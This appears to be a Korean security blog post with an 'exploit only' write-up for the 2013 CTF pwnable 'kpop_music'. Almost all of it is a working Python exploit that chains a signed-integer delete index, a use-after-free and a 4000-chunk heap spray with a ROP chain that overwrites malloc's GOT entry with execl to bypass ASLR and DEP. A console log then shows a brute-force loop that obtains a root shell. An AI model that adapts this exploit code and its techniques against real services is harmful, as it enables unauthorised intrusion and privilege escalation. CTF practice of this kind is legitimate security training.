Category : Pwnables
kpop_musicSummary : signed integer, use-after-free, heap-spray, ASLR & DEP bypass
Exploit
#!/usr/bin/python import sys from struct import pack show = lambda : sys.stdout.write("1\n") add = lambda title, url: sys.stdout.write("2\n"+title+"\n"+url+"\n") modify = lambda num, title, url: sys.stdout.write("3\n"+"1\n"+num+"\n"+title+"\n"+url+"\n") delete = lambda num: sys.stdout.write("4\n"+"1\n"+num+"\n") p = lambda x: pack("<L", x) lift_esp = 0x08049A72 # add esp, 0x1c; pop ebx; pop esi; pop edi; pop ebp; ret ppr = 0x08048FD1 # pop ebx; pop ebp; ret pppr = 0x08049A76 # pop esi; pop edi; pop ebp; ret pop_ecx = 0x08049ac4 # pop ecx; pop ebx; leave; ret custom_stack = 0x8f9f120 sprintf_plt = 0x08048704 # sprintf@plt malloc_got = 0x0804B434 # malloc@got format_string = 0x08049b94 # string "%s" ########## ROP payload for bypass ASLR & DEP ######### stage_0 = "" # stage_0 payload just builds custom-stack for stage_1 payload stage_0 += p(ppr+2)*14 # ret sled #------- COPY byte codes to generate custom stack ----------# stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack-4) stage_0 += p(format_string) stage_0 += p(0x08048da9) # "\xd0" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack-3) stage_0 += p(format_string) stage_0 += p(0x08049875) # "\x8f" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack-2) stage_0 += p(format_string) stage_0 += p(0x08049a1b) # "\x00" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack-1) stage_0 += p(format_string) stage_0 += p(0x08049a2d) # "\xad" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack) stage_0 += p(format_string) stage_0 += p(0x080485d9) # "\x1e" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack) stage_0 += p(format_string) stage_0 += p(0x080485d9) # "\x1e" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+1) stage_0 += p(format_string) stage_0 += p(0x08048a8a) # "\x89" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+2) stage_0 += p(format_string) stage_0 += p(0x080483b6) # "\x04\x08" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+8) stage_0 += p(format_string) stage_0 += p(0x08048028) # "\x34" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+9) stage_0 += p(format_string) stage_0 += p(0x080492ba) # "\x88" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+10) stage_0 += p(format_string) stage_0 += p(0x080483b6) # "\x04\x08" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+10) stage_0 += p(format_string) stage_0 += p(0x080483b6) # "\x04\x08" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+16) stage_0 += p(format_string) stage_0 += p(0x08048404) # "\x76" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+17) stage_0 += p(format_string) stage_0 += p(0x08049a1a) # "\x84" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+18) stage_0 += p(format_string) stage_0 += p(0x080483b6) # "\x04\x08" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+20) stage_0 += p(format_string) stage_0 += p(0x08049a1b) # "\x00" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+21) stage_0 += p(format_string) stage_0 += p(0x08049a1b) # "\x00" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+22) stage_0 += p(format_string) stage_0 += p(0x08049a1b) # "\x00" stage_0 += p(sprintf_plt) stage_0 += p(pppr) stage_0 += p(custom_stack+23) stage_0 += p(format_string) stage_0 += p(0x08049a1b) # "\x00" #-----------------------------------------------------------# #-- initialize register & mov stack frame to custom stack --# stage_0 += p(ppr+1) stage_0 += p(custom_stack-4) """ execl@libc - malloc@libc = 0x3e7e0 """ stage_0 += p(pop_ecx) # (set ecx to the offset between execl@libc, malloc@libc) & (move stack frame) stage_0 += p(0x3e7e0) # offset between execl@libc, malloc@libc #-----------------------------------------------------------# #- this stage_1 payload will be generated in custom stack --# """ stage_1 = "" stage_1 += p(0xad008fd0) # malloc@got - 0x5b042464 stage_1 += p(0x0804891e) # add [ebp+0x5b042464] ecx ; pop ebp ;; stage_1 += p(0xdeadbeef) # dummy stage_1 += p(0x08048834) # malloc@plt -> now malloc@got points execl@libc stage_1 += p(0xdeadbeef) # dummy stage_1 += p(0x08048476) # string "sh" stage_1 += p(0) """ #-----------------------------------------------------------# ####################################################### ##################### ALLOCATE ######################## for i in range(0, 3): add("a"*10, "b"*10) ####################################################### ################### HEAP-SPRAY ######################## for i in range(0, 4000): add(p(lift_esp)*(0xbb4/4), p(lift_esp)*(0xbb4/4)) ####################################################### ############# PUT ROP PAYLOAD IN STACK ################ add("title", stage_0+"1") ####################################################### ################## TRIGGER VULN ####################### delete("-1073741820") modify("3", "A"*0x50, "\x20\x31\x31\x09"*3) show() ####################################################### |
root@ubuntu:~/vuln/500# while [ 1 ] ; do (./exploit.py;cat) | ./kpop_music ; done ==================================================================== __ __ ____ ____ ____ __ _____ _______ __________ / //_// __ \/ __ \/ __ \ / |/ / / / / ___// _/ ____/ / ,< / /_/ / / / / /_/ / / /|_/ / / / /\__ \ / // / / /| |/ ____/ /_/ / ____/ / / / / /_/ /___/ // // /___ /_/ |_/_/ \____/_/ /_/ /_/\____//____/___/\____/ Welcome to the KPOP Music WORLD! ==================================================================== ------------------------ 1. Show kpop song list 2. Add a new kpop song 3. Modify kpop song 4. Delete kpop song 5. Search kpop song 6. Quit ------------------------ MENU> kpop_song title : Youtube URL : [*] successfully added a new song ....................................................................... ....................................................................... 2. Gone not around any longer(SISTAR19) - http://www.youtube.com/watch?v=JtVhwsACgTw 3. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA - id uid=0(root) gid=0(root) 그룹들=0(root) |
'CTF > 2013' 카테고리의 다른 글
| Plaid CTF 2013 Write up collection (0) | 2013.04.23 |
|---|---|
| Plaid CTF 2013 - pork (Exploit only) (0) | 2013.04.22 |
| Codegate 2013 Qual - Vulnerab 400 (Exploit only) (0) | 2013.04.17 |
| Codegate 2013 Qual - Vulnerab 300 (Exploit only) (0) | 2013.04.17 |
| Codegate 2013 Qual - Vulnerab 200 (Exploit only) (0) | 2013.04.17 |
